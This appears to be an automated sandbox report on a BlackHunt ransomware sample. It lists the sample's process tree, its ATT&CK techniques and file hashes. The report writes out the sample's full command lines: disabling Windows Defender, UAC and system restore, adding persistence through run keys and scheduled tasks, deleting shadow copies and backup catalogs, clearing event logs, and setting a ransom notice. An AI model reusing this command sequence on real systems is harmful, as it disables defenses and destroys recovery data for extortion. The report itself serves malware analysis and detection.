f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe cmd.exe PID 4848 wrote to memory of 2944 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe cmd.exe PID 4244 wrote to memory of 1840 4244 cmd.exe reg.exe PID 4244 wrote to memory of 1840 4244 cmd.exe reg.exe PID 5084 wrote to memory of 4688 5084 cmd.exe reg.exe PID 5084 wrote to memory of 4688 5084 cmd.exe reg.exe PID 4848 wrote to memory of 5112 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe cmd.exe PID 4848 wrote to memory of 5112 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe cmd.exe PID 4848 wrote to memory of 1348 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe cmd.exe PID 4848 wrote to memory of 1348 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe cmd.exe PID 4460 wrote to memory of 4800 4460 cmd.exe reg.exe PID 4460 wrote to memory of 4800 4460 cmd.exe reg.exe PID 2944 wrote to memory of 4148 2944 cmd.exe reg.exe PID 2944 wrote to memory of 4148 2944 cmd.exe reg.exe PID 4848 wrote to memory of 536 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe cmd.exe PID 4848 wrote to memory of 536 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe cmd.exe PID 4848 wrote to memory of 4260 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe cmd.exe PID 4848 wrote to memory of 4260 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe cmd.exe PID 1284 wrote to memory of 2876 1284 cmd.exe reg.exe PID 1284 wrote to memory of 2876 1284 cmd.exe reg.exe PID 1348 wrote to memory of 4768 1348 cmd.exe reg.exe PID 1348 wrote to memory of 4768 1348 cmd.exe reg.exe PID 4848 wrote to memory of 4884 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe cmd.exe PID 4848 wrote to memory of 4884 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe cmd.exe PID 4848 wrote to memory of 5072 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe cmd.exe PID 4848 wrote to memory of 5072 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe cmd.exe PID 5112 wrote to memory of 3532 5112 cmd.exe reg.exe PID 5112 wrote to memory of 3532 5112 cmd.exe reg.exe PID 4848 wrote to memory of 440 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe cmd.exe PID 4848 wrote to memory of 440 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe cmd.exe PID 4848 wrote to memory of 60 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe cmd.exe PID 4848 wrote to memory of 60 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe cmd.exe PID 536 wrote to memory of 5096 536 cmd.exe reg.exe PID 536 wrote to memory of 5096 536 cmd.exe reg.exe PID 4848 wrote to memory of 4960 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe cmd.exe PID 4848 wrote to memory of 4960 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe cmd.exe PID 4848 wrote to memory of 1000 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe cmd.exe PID 4848 wrote to memory of 1000 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe cmd.exe PID 5072 wrote to memory of 4144 5072 cmd.exe reg.exe PID 5072 wrote to memory of 4144 5072 cmd.exe reg.exe -
System policy modification 1 TTPs 3 IoCs
Processes:
f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe"C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Black" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Black" /f3⤵
- Modifies registry class
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Black\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Black\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Black" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Black" /f3⤵
- Modifies registry class
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Black\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Black\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityService" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -backups " /f2⤵
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityService" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -backups " /f3⤵
- Adds Run key to start application
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SchTasks.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Update service Windows System" /TR "C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -backups" /f2⤵
-
C:\Windows\system32\schtasks.exeSchTasks.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Update service Windows System" /TR "C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -backups" /f3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [amike1096@gmail.com] AND [onion746@onionmail.com] " /f2⤵
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [amike1096@gmail.com] AND [onion746@onionmail.com] " /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG DELETE "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "HealthService" /f2⤵
-
C:\Windows\system32\reg.exeREG DELETE "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "HealthService" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c start /min cmd /c del /F C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /F C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe3⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Modify Registry
5Disabling Security Tools
2Bypass User Account Control
1Indicator Removal on Host
1File Deletion
3Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\#BlackHunt_ReadMe.htaFilesize
10KB
MD5c4e9dc244ac49843a08da3e6609c775f
SHA1189866d7e0e5422abddf454ee31b53bef64c558f
SHA25616c664e9f9d0d8cbb60ed020016054492b4549183dc2028382c3faf47cf627e8
SHA5126c396c98254eda5b20e6e32034f9875f5cfe87a7ab8d76a65a20a2a18594a38d647fced8fec8e9457f1ee44ece7062af4bb461481d6b4f6718b2783aecda4fe2
-
C:\ProgramData\#BlackHunt_ReadMe.txtFilesize
687B
MD53409cb1796ae3e9bd975c8303469b955
SHA13a126e1f3b7c4dc37676e1a2a8131ddd880591f4
